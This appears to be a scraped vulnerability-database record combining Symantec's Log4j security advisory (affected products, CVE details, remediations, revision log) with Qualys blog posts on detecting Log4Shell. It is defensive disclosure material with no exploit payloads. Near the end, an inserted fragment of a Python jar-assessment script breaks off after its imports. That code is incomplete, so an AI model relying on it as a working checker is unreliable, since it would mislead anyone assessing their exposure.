system. 
\n \n\n\n**Affected Product(s)**\n\nThe following products and product versions are vulnerable to the CVEs listed. **If a CVE is not listed, the product or version is not known to be vulnerable to it.**\n\n**Layer7 API Developer Portal**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 4.4, 4.5, 5.0 & 5.0 CR1, 5.0.2 & 5.0.2.1 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230205> \n \n**Layer7 API Developer Portal SaaS**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 5.0.3 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230205> \n \n**Layer7 API Gateway**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 9.4, 10.0, 10.1 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230205> \n \n**Layer7 Live API Creator**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 5.4, 5.1-5.3 (EOS) | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230205> \n \n**Symantec Advanced Authentication**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 9.1, 9.1.01, 9.1.02 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230301> \n \n**Symantec Endpoint Detection and Response (EDR) On-premise**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228, CVE-2021-45046 | 2.x, 3.x, 4.x | Upgrade to 4.6.8 or apply patch atp-patch-generic-4.6-1 to versions 4.6.0, 4.6.5, and 4.6.7. The product patch is only supported for versions 4.6.0 and above. All other customers must upgrade to 4.6.8. 
\n \n \n\n**Symantec Identity Governance and Administration**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 14.2, 14.3, 14.4 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230278> \n \n**Symantec Privileged Access Manager**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228, CVE-2021-45046 | 3.4.x, 4.0.x | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230405> \n \n**Symantec Privileged Access Manager Server Control**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228, CVE-2021-45046 | 14.0.x, 14.1.x | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230586> \n \n**Symantec Privileged Identity Manager**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228, CVE-2021-45046 | 12.9.x | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230668> \nCVE-2021-44228, CVE-2021-45046 | 14.0 | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230670> \n \n**Symantec SiteMinder (CA Single Sign-on)**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 12.8.x Policy Server, 12.8.x Administrative UI, 12.8.x Access Gateway, 12.8.x SDK, 12.7 and 12.8 ASA Agents | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230270> \n \n**Symantec VIP Authentication Hub** (_separate from Symantec VIP_)\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | All Releases of AuthHub | Please refer to the following KB article: <https://knowledge.broadcom.com/external/article?articleId=230768> \n \n**Web Isolation (WI) On-premise**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228 | 1.14 | 
Apply the Log4j patch available on Support Downloads. Please refer to the following KB article for patch instructions: <https://knowledge.broadcom.com/external/article?articleId=230812> \n \n \n\nThe following products have not been demonstrated to be affected but may be affected. Customers are advised to apply the recommended remediations to mitigate any possible risk.\n\n**LiveUpdate Administrator (LUA)**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228, CVE-2021-45046 | 2.3.8, 2.3.9 | Upgrade to 2.3.10. \n \n**Symantec Endpoint Protection Manager (SEPM)**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-44228, CVE-2021-45046 | 14.2 and above | A fix for Symantec Endpoint Protection Manager (SEPM) is available in 14.3 RU3 build 5427. Please refer to the following KB article: <https://knowledge.broadcom.com/external/article/230359> \n \n**Symantec Endpoint Protection (SEP) for Mobile**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-4104 | SEP for Mobile was found affected and was already remediated. \n \n**Threat Defense for Active Directory (TDAD)**\n\n**CVE** | **Supported Version(s)** | **Remediation** \n---|---|--- \nCVE-2021-4104 | All versions | Upgrade to 3.6.2.4. \n \n \n\nThe following Symantec SaaS services were found to be affected. If a vulnerability was remediated in a SaaS service, customers do not need to take any additional action.\n\n**Cloud Workload Assurance (CWA)**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228, CVE-2021-45046 | Some CWA dependencies were found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. \n \n**Cloud Workload Protection (CWP)**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228, CVE-2021-45046 | Some CWP dependencies were found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. 
\n \n \n\n**Cloud Workload Protection for Storage (CWP:S)**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228, CVE-2021-45046 | Some CWP:S dependencies were found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. \n \n**Email Security Service (ESS)**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228, CVE-2021-45046 | ESS was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 17. \n \n**Industrial Control System Protection (ICSP)**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228, CVE-2021-45046 | ICSP was found to be affected. An initial remediation was deployed on Dec 15. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 21. \n \n**Secure Access Cloud (SAC)**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228 | SAC was found affected and was already remediated. \n \n**Symantec Endpoint Security (SES)**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228 | SES was found to be affected. An initial remediation was deployed on Dec 16. The complete remediation was deployed on Dec 23. \n \n**Web Isolation (WI) Cloud**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228 | WI Cloud was found affected and was already remediated. \n \n**Web Security Service (WSS) Reporting**\n\n**CVE** | **Remediation** \n---|--- \nCVE-2021-44228 | WSS Reporting was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 16. 
\n \n \n\n**Additional Product Information**\n\nThe following products are not vulnerable: \n\n * Advanced Secure Gateway (ASG) \n * BCAAA \n * CloudSOC Cloud Access Security Broker (CASB) \n * Content Analysis (CA) \n * Critical System Protection (CSP) \n * Data Center Security (DCS) \n * Data Loss Prevention (DLP) \n * HSM Agent \n * Ghost Solution Suite (GSS) \n * Information Centric Analytics (ICA) \n * Information Centric Tagging (ICT) \n * Integrated Cyber Defense Exchange (ICDx) \n * Integrated Secure Gateway (ISG) \n * Intelligence Services / WebFilter / WebPulse \n * IT Analytics (ITA) \n * IT Management Suite \n * Layer7 Mobile API Gateway \n * Management Center (MC) \n * Mirror Gateway \n * PacketShaper (PS) S-Series \n * PolicyCenter (PC) S-Series \n * ProxySG \n * Reporter \n * Security Analytics (SA) \n * ServiceDesk \n * SSL Visibility (SSLV) \n * Symantec Directory \n * Symantec Control Compliance Suite (CCS) \n * Symantec Endpoint Encryption (SEE) \n * Symantec Endpoint Protection (SEP) Agent \n * Symantec Insight Private Cloud \n * Symantec Mail Security for Microsoft Exchange (SMSMSE) \n * Symantec Messaging Gateway (SMG) \n * Symantec PGP Solutions \n * Symantec Protection Engine (SPE) \n * Symantec Protection for SharePoint Servers (SPSS) \n * Symantec VIP \n\n**Symantec Protection Bulletins**\n\nMultiple Symantec products can detect and provide protection against attacks exploiting CVE-2021-44228 in customer environments. 
Refer to the following publications for more information:\n\n * Symantec Web Application Firewall (WAF) Protection: <https://knowledge.broadcom.com/external/article/230903>\n * Symantec Protection Bulletin: <https://www.broadcom.com/support/security-center/protection-bulletin#blt3e71edabe2937935_en-us> \n \n\n\n**Issue Details**\n\n**CVE-2021-44228**\n\n**Severity / CVSS v3.1:** Critical / 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) \n**References:** NVD: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \n**Impact:** Remote code execution (RCE) \n**Description:** The Apache Log4j 2 JNDI lookup functionality allows loading executable code from remote sources. A remote attacker, who can trigger Log4j to log crafted malicious strings, can execute arbitrary code on the target system. Other unknown security impact is also possible. \n \n**CVE-2021-4104**\n\n**Severity / CVSS v3.1:** High / 8.1 (AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n**References:** NVD: [CVE-2021-4104](<https://nvd.nist.gov/vuln/detail/CVE-2021-4104>) \n**Impact:** Remote code execution \n**Description:** Apache Log4j 1.2 allows malicious Log4j configuration files to trigger JNDI lookups and cause remote code execution. A remote attacker, with write access to the Log4j configuration, can execute arbitrary code on the target system. \n \n**CVE-2021-45046**\n\n**Severity / CVSS v3.1:** Critical / 9.0 (AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H) \n**References:** NVD: [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>) \n**Impact:** Remote code execution, denial of service \n**Description:** The Apache Log4j 2 JNDI lookup functionality allows loading executable code from remote sources. A remote attacker, who controls Thread Context Map (MDC) input data, can execute arbitrary code on the target system or cause denial of service. 
This vulnerability is caused by an incomplete fix to CVE-2021-44228 in certain non-default Log4j configurations. Apache Log4j 2.16 resolves this vulnerability. \n \n \n\n**References**\n\n * Apache Log4j Security Vulnerabilities - <https://logging.apache.org/log4j/2.x/security.html>\n * Symantec VIP Security Advisory - <https://knowledge.broadcom.com/external/article/230287/symantec-vip-security-advisory-for-log4j.html> \n\n**Revisions**\n\n * 2022-01-20 20:20 ET - A fix for CVE-2021-4104 for Threat Defense for Active Directory (TDAD) is available in 3.6.2.4. Advisory Status moved to Closed. \n * 2022-01-12 10:40 ET - SEP for Mobile was found affected for CVE-2021-4104 and was already remediated. Removed CVE-2021-4104 from under investigation for Symantec Endpoint Security (SES). \n * 2022-01-07 00:10 ET - Added Symantec VIP Security Advisory link to the references. \n * 2021-12-27 13:20 ET - Added Symantec Endpoint Protection (SEP) for Mobile as under investigation for CVE-2021-4104. \n * 2021-12-23 20:10 ET - The complete remediation for CVE-2021-44228 for Cloud Workload Assurance (CWA), Cloud Workload Protection (CWP), Cloud Workload Protection for Storage (CWP:S), and Symantec Endpoint Security (SES) was deployed on Dec 23. \n * 2021-12-21 20:00 ET - The complete remediation for Industrial Control System Protection (ICSP) was deployed on Dec 21. \n * 2021-12-20 11:15 ET - Added CVE-2021-4104 and CVE-2021-45046. \n * 2021-12-20 14:21 ET - On-premise Web Isolation (WI) 1.14 is affected. Apply the patch available on Support Downloads. \n * 2021-12-20 10:20 ET - A fix for LiveUpdate Administrator (LUA) is available in 2.3.10. \n * 2021-12-18 22:14 ET - Multiple Symantec products can detect and provide protection against attacks exploiting CVE-2021-44228 in customer environments. See more information in the Symantec Protection Bulletins section. 
\n * 2021-12-17 21:30 ET - Cloud Workload Assurance (CWA), Cloud Workload Protection (CWP), Cloud Workload Protection for Storage (CWP:S), and Symantec Endpoint Security (SES) were found to be affected. An initial remediation was deployed on Dec 16. Broadcom is actively working on deploying the complete remediation. \n * 2021-12-17 19:30 ET - A fix for Symantec Endpoint Detection and Response (EDR) On-premise is available in 4.6.8 or by applying patch atp-patch-generic-4.6-1 to versions 4.6.0, 4.6.5, and 4.6.7. \n * 2021-12-17 18:25 ET - Email Security Service (ESS) was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 17. \n * 2021-12-17 16:25 ET - Web Isolation (WI) Cloud was found affected and was already remediated. \n * 2021-12-17 14:45 ET - Moved LiveUpdate Administrator (LUA) to the Affected Product(s). \n * 2021-12-17 12:00 ET - A fix for LiveUpdate Administrator (LUA) is available in 2.3.10. \n * 2021-12-16 18:40 ET - Intelligence Services / WebFilter / WebPulse and Threat Defense for Active Directory (TDAD) are not vulnerable. \n * 2021-12-16 15:00 ET - WSS Reporting was found to be affected. An initial remediation was deployed on Dec 13. Further investigation showed that the initial remediation is no longer considered sufficient. The complete remediation was deployed on Dec 16. \n * 2021-12-16 14:35 ET - Moved Cloud Workload Assurance (CWA), Cloud Workload Protection (CWP), Cloud Workload Protection for Storage (CWP:S), and SES Cloud Console (SESC) to under investigation. \n * 2021-12-16 12:55 ET - Added Symantec IGA to the Affected Product List along with mitigation instructions. \n * 2021-12-16 12:00 ET - Secure Access Cloud (SAC) was found affected and was already remediated. \n * 2021-12-16 9:55 ET - A fix for Symantec Endpoint Protection Manager (SEPM) is available in 14.3 RU3 build 5427. 
\n * 2021-12-15 18:20 ET - Moved Web Security Service (WSS) Reporting to under investigation. \n * 2021-12-15 14:45 ET - Moved Email Security Service (ESS) to under investigation. \n * 2021-12-15 11:00 ET - Added Symantec Privileged Access Manager to the Affected Product List along with mitigation instructions. \n * 2021-12-15 00:30 ET - Added Symantec Privileged Identity Manager to the Affected Product List along with mitigation instructions. \n * 2021-12-14 19:50 ET - Symantec Endpoint Protection (SEP) for Mobile is not vulnerable. \n * 2021-12-14 18:15 ET - Information Centric Tagging (ICT) and Symantec Insight Private Cloud are not vulnerable. \n * 2021-12-14 17:30 ET - LiveUpdate Administrator (LUA): all supported versions are affected. \n * 2021-12-14 15:02 ET - Email Security Service (ESS) was found affected. \n * 2021-12-14 14:35 ET - Management Center is not vulnerable. \n * 2021-12-14 13:05 ET - ICDx is not vulnerable. \n * 2021-12-14 12:25 ET - SEPM 14.2 and later versions are affected. \n * 2021-12-14 10:30 ET - Added PAM Server Control to the Affected Product List along with mitigation instructions. \n * 2021-12-14 00:30 ET - Added Layer7 API Gateway to the Affected Product List with a remediation link referring to the KB article. \n * 2021-12-13 17:45 ET - HSM Agent is not vulnerable. \n * 2021-12-13 15:20 ET - Added Layer7 API Developer Portal, Layer7 API Developer Portal SaaS & Layer7 Live API Creator to the Affected Product List. \n * 2021-12-13 18:10 ET - Content Analysis (CA), Integrated Secure Gateway (ISG), Reporter, and Mirror Gateway are not vulnerable. The WSS Reporting feature was found affected and was remediated. Remote code execution was not possible, but other unknown attack vectors may have been possible. \n * 2021-12-13 15:20 ET - Added VIP Authentication Hub to the Affected Product List and updated the mitigation section. \n * 2021-12-13 15:05 ET - Added Integrated Cyber Defense Exchange (ICDx) to the list of products under investigation. 
Advanced Secure Gateway (ASG), BCAAA, and SSL Visibility (SSLV) are not vulnerable. \n * 2021-12-13 13:30 ET - Added Symantec SiteMinder to the Affected Product List along with remediation. Also PacketShaper (PS) S-Series and PolicyCenter (PC) S-Series are not vulnerable. \n * 2021-12-13 12:25 ET - Cloud Workload Protection (CWP), Cloud Workload Protection for Storage (CWP:S), Industrial Control System Protection (ICSP), Critical System Protection (CSP), Cloud Workload Assurance (CWA), Information Centric Analytics (ICA), and IT Analytics (ITA) are not vulnerable. \n * 2021-12-13 11:15 ET - Added Advanced Authentication 9.1.02 to the Affected Product List. Also Symantec Messaging Gateway (SMG) and ServiceDesk are not vulnerable. \n * 2021-12-13 02:00 ET - Symantec Endpoint Encryption (SEE) is not vulnerable. \n * 2021-12-12 11:45 ET - Symantec Mail Security for Microsoft Exchange (SMSMSE), Symantec Protection Engine (SPE), and Symantec Protection for SharePoint Servers (SPSS) are not vulnerable. \n * 2021-12-12 19:20 ET - Symantec Endpoint Protection (SEP) is not vulnerable. \n * 2021-12-12 00:20 ET - Added information about remaining Symantec products. 
\n * 2021-12-11 12:30 ET - Added the proactive notification link to Advanced Authentication, Risk Authentication & Strong Authentication. \n * 2021-12-11 12:15 ET - Updated Affected Products along with link to proactive notifications, Workarounds and Updated Non-Affected Products. \n * 2021-12-11 06:00 ET - Updated Non-Affected Products & Added Link to Product Security Advisories. \n * 2021-12-11 00:30 ET - Added Recommended Mitigations & Updated Non-Affected Products. \n * 2021-12-10 20:30 ET - Initial Release.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T01:06:47", "type": "symantec", "title": "Symantec Security Advisory for Log4j Vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-21T17:28:40", "id": "SMNTC-19793", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-12-21T10:37:15", "description": "We have now added two new option profiles to our library for Log4Shell vulnerabilities. Option profiles define the settings you want to use for your scan. 
These new option profiles are tuned to quickly detect the Log4Shell vulnerability on assets in your environment.\n\nThe following two pre-configured option profiles are now available in the library to help you get started:\n\n 1. Log4Shell - Authenticated Scan\n 2. Log4Shell - Unauthenticated Scan\n\nYou can import these profiles into your account and use them as-is or edit them as needed.\n\n### Importing Option Profiles\n\nTo import our option profiles, go to **Scans** > **Option Profiles** > **New** and select **Import from Library**.\n\nChoose the **Log4Shell - Authenticated Scan** or **Log4Shell - Unauthenticated Scan** option and click **Import**.\n\nNote: Use the **Log4Shell - Authenticated Scan** option profile for authenticated scans and the **Log4Shell - Unauthenticated Scan** option profile for unauthenticated scans. For information on authenticated and unauthenticated scans, refer to the [Why Use Host Authentication?](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/authentication/authentication_lp.htm>) section of the Online Help.\n\nWe recommend making the option profile **Global** to make it available to all users in the subscription.\n\nThe Log4Shell option profiles come with pre-defined search lists that include the Log4Shell QIDs. When you scan using these option profiles, the scanner first gathers information about the host and then scans for all QIDs listed with these option profiles. For information on the QIDs listed with these option profiles, refer to the Search Lists section.\n\nThe **Scan Settings** tab in the Option Profile information provides an option to view the complete list of QIDs that are included in the option profile.\n\nReview the other tabs of these option profiles to confirm they suit your requirements. Note that these option profiles set the performance of the scan to **Normal**. 
If you are concerned about the performance impact, Qualys recommends you change these settings to match your requirements.\n\nWhen you are ready to scan your environment for Log4Shell vulnerabilities, run a scan and be sure to select the option profile you just imported. You can associate the option profile when you trigger the scan. For more information on scans, refer to the [Scan for Vulnerabilities](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/scans/vm_scans_lp.htm>) topic in the Online Help.\n\nOnce the scan is completed, you can view the scan report to see which assets are affected by the vulnerabilities. Go to the reports list and check that your report is finished - the status will show \"Finished\". For more information on scan reports, refer to the [Reporting on your Vulnerabilities and Assets](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/reports/vulnerability_reports_lp.htm>) topic in the Online Help.\n\n### Search Lists\n\nQualys has released 2 search lists covering the QIDs associated with Log4Shell:\n\n 1. **Log4Shell Dynamic Search List**: This is a **dynamic search list** that searches for vulnerabilities related to Apache Log4j2 Zero-Day Exploited in the Wild (Log4Shell). This search list includes the following CVE IDs:\n * CVE-2021-45046\n * CVE-2021-44228\n * CVE-2021-4104\n * CVE-2021-45105\n 2. **Log4Shell Static Search List**: This is a **static search list** that helps in the detection of Apache Log4j2 Zero-Day Exploited in the Wild (Log4Shell). 
This search list includes the following QIDs:\nQID Number| QID Title \n---|--- \n45006| Traceroute \n45017| OS Detected \n70000| NetBIOS name accessible \n82023| Open TCP Services List \n45039| Hostname found \n6| DNS Host Name \n82044| NetBIOS \n34011| Firewall detected \n43007| Network adapter MAC address \n45038| Host scan time \n82062| NetBIOS Workgroup name detected \n45141| Installed Packages on Unix and Linux Operating Systems \n45179| Report Qualys Host ID Value \n90235| Installed Applications Enumerated From Windows Installer \n45456| Windows WMI Authentication Level status \n45484| Correlation id service running \n48143| Correlation id detected", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T17:33:11", "type": "qualysblog", "title": "New Options Profiles for Log4Shell Detection", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2021-12-20T17:33:11", "id": "QUALYSBLOG:5059D1C3913FB6542F3283A66F9B3A43", "href": 
"https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-23T02:37:17", "description": "#### Update\n\nTake advantage of our free service to quickly detect vulnerabilities in your external attack surface. Visit [qualys.com/was-log4shell-help](<https://www.qualys.com/was-log4shell-help>) to get started.\n\n#### Update \u2013 December 22, 2021 7:53 PM ET\n\nA bug in external scanners could result in false negatives when unauthenticated Log4Shell scans were run with external scanners. This issue is now resolved, and the fix will be rolled out by 11 PM ET today.\n\n#### Update \u2013 December 22, 2021 5:55 AM ET\n\nAdded information about a new rule and dashboard in CSAM to quickly identify the vulnerable software and hosts.\n\n#### Update \u2013 December 20, 2021 1:00 PM ET\n\nQualys is aware of false negatives for QIDs 376160, 376195 and 376193. They read the file generated by the [Qualys Log4j Scan Utility](<https://github.com/Qualys/log4jscanwin>), and the signatures addressing them were released at 1 PM ET on Dec 20th. They are part of VULNSIGS-2.5.359-3 or later.\n\n#### Update \u2013 December 18, 2021 9:00 PM ET\n\nTwo new QIDs (376194, 376195) to address CVE-2021-45105 (Log4j < 2.17) were released at 9 PM ET on Dec 18th. They are part of VULNSIGS-2.5.357-9 or later.\n\n#### Update \u2013 December 18, 2021 4:20 PM ET\n\n * [Two new option profiles for authenticated and unauthenticated Log4Shell scans are now added to the platform](<https://blog.qualys.com/vulnerabilities-threat-research/2021/12/20/new-options-profiles-for-log4shell-detection>).\n * The QID for CVE-2021-45105 will be available on or before 6 PM PDT on Dec 18.\n\n#### Update \u2013 December 18, 2021 1:00 PM ET\n\nWe are aware of a third update to Log4j, v2.17 (CVE-2021-45105), and are working on building QIDs for it. 
We will provide an ETA by 10 PM ET today if not earlier.\n\n#### Update \u2013 December 17, 2021 4:38 PM ET\n\nAccording to reports, the Log4Shell vulnerability can also be triggered locally by way of a JavaScript WebSocket connection, leading to the same remote code execution (RCE).\n\nThis attack vector significantly increases the attack surface of this vulnerability beyond what was previously known. See details [here](<https://www.blumira.com/analysis-log4shell-local-trigger/>).\n\nThe only recommendation at this point is to update Log4j to the latest version or remove the JndiLookup class from the log4j-core jar.\n\nAuthenticated scans at this point provide the most accurate representation of risk and attack surface.\n\n#### Update \u2013 December 17, 2021 2:06 PM ET\n\nAdded QID 376187 for the Apache Log4j 1.2 Remote Code Execution Vulnerability (CVE-2021-4104). \n\n#### Update \u2013 December 16, 2021 6:19 PM ET\n\nUpdated dashboard.\n\n#### Update \u2013 December 16, 2021 6:20 AM ET\n\nThe mitigation shared earlier is no longer considered sufficient by the vendor - <https://logging.apache.org/log4j/2.x/security.html#CVE-2021-44228>. The safest thing to do is to upgrade Log4j to a safe version or remove the JndiLookup class from the log4j-core jar. Qualys has not removed the mitigation QIDs so that customers do not lose track of the progress made on them.\n\nAdded QID 376160 for the zero-day vulnerability affecting the popular Apache Log4j utility (CVE-2021-44228) that results in remote code execution (RCE). Affected versions are Log4j 2.x prior to and including 2.15.0. This QID reads the file generated by the [Qualys Log4j Scan Utility](<https://github.com/Qualys/log4jscanwin>). 
The QID reads the first 100,000 characters of the generated output file.\n\n#### Update \u2013 December 14, 2021 8:45 PM ET\n\nLog4j discussion and Q&A webinars from Monday, Dec 13 are available to [watch on demand](<https://qualys.com/log4j-webinar-2>).\n\n#### Update \u2013 December 14, 2021 2:10 PM ET\n\n * Windows detection added to QID 376157 with version 2.5.354-2\n * Remote QID 730297 updated to include additional payloads using LDAPS, RMI, DNS, IIOP, NIS, NDS, HTTP and CORBA with version 2.5.354-2\n\n#### Update \u2013 December 13, 2021 3:30 PM ET\n\nAdded QIDs 178935, 178934, 317118, 317114, 317117, 317115 and 690737 to address the Log4j vulnerability\n\n#### Update \u2013 December 13, 2021 2:00 PM ET\n\nAdded information related to expediting testing for CVE-2021-44228 using Qualys WAS\n\n#### Update \u2013 December 13, 2021 1:00 PM ET\n\nAdded QIDs 45514 and 48199 to address the Log4j vulnerability\n\nQID 376157 updated to not post the vulnerability on Log4j API-only installations\n\n#### Update \u2013 December 13, 2021 11:39 AM ET\n\nAdded information related to IG QIDs which can be used to detect assets where mitigations are applied\n\n#### Update \u2013 December 12, 2021 8:54 PM ET\n\nAdded information related to remediating the Log4j vulnerability using Qualys Patch Management\n\n#### Update \u2013 December 12, 2021 4:30 PM ET\n\nAdded information related to mitigation controls along with specific QIDs that will help detect assets with mitigation controls applied\n\n#### Update \u2013 December 12, 2021 10:30 AM ET\n\nThe Qualys Security Operations team has conducted a detailed investigation of our platforms to determine the vulnerable versions of Log4j needing remediation. We have implemented multiple measures for mitigation which include:\n\n 1. Rolling out the latest version of Log4j where applicable, or making configuration changes on the confirmed hosts.\n 2. Configuration of custom rules to intercept and drop malicious web requests.\n 3. 
Blocking known IoCs available via threat feeds and research.\n 4. Signature updates to perimeter security solutions like IPS/WAF to block any exploit attempts on our platforms.\n\n#### Update \u2013 December 11, 2021 11:30 PM ET\n\n * WAS QID 150440 was released to customers along with VULNSIGS-2.5.352-4.\n * QID 376157 was updated to look for vulnerable installs using the locate and ls proc commands\n\n* * *\n\nAn exploit for a [critical zero-day vulnerability](<https://logging.apache.org/log4j/2.x/security.html>) affecting Apache Log4j 2, known as Log4Shell, was disclosed on December 9, 2021. All Log4j 2 versions from 2.0-beta9 through 2.15.0 are affected (the security backports 2.12.2, 2.12.3 and 2.3.1 excepted). This vulnerability is actively being exploited in the wild.\n\nLog4j 2 is a ubiquitous logging library used by millions of Java applications. Log4j was originally created by Ceki G\u00fclc\u00fc; the library is part of the Apache Software Foundation's Apache Logging Services project.\n\nThe vulnerability, when exploited, results in remote code execution on the vulnerable server with the privileges of the Java process, which on many servers are elevated. As a result, it is rated at a CVSS v3 score of 10.0.\n\nApache Log4j 2 version 2.16.0 fixes this vulnerability; 2.15.0 only disabled message lookups by default, and the remaining exposure is tracked as CVE-2021-45046. \n\nWe are continuously monitoring all our environments for any indication of active threats and exploits. With these measures, we are confident that the necessary mitigations and remediation are in place to block and prevent any exploits of the Log4j RCE and that there is no impact on Qualys scanners, Cloud Agent, QGS, systems or customer data. We will continue to monitor our environment round the clock and implement additional measures as required. \n\n## Qualys Coverage\n\nThe Qualys Research Team has released both unauthenticated and authenticated QIDs to address this vulnerability. 
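The affected-version range (2.0-beta9 through 2.15.0, 2.16 for CVE-2021-45046, 2.17 for CVE-2021-45105) and the "remove the JndiLookup class from the log4j-core jar" mitigation quoted above are both easy to get wrong in an inventory script: pre-release tags such as 2.0-beta9 break naive string comparison, and log4j-core is frequently nested inside a WAR or shaded into an application jar with no version marker. The assessor below is an added example, not code from this page, from Qualys or from Apache. It assumes the Maven layout of real log4j-core jars (a pom.properties under META-INF/maven/org.apache.logging.log4j/log4j-core/ and JndiLookup.class under org/apache/logging/log4j/core/lookup/), names nested entries outer!/inner as Java class loaders do, and uses its own verdict strings; the sample archives are constructed in memory with marker files only, so it runs offline.

```python
"""Log4j-core archive assessor (added example; not code from this page, Qualys or Apache).
Reads the version from log4j-core's Maven pom.properties, checks whether JndiLookup.class
is still present, recurses into nested archives, and classifies each hit against the
affected ranges quoted on this page. Sample archives are constructed in memory."""
import io
import re
import zipfile
from typing import Dict, List, Optional, Tuple

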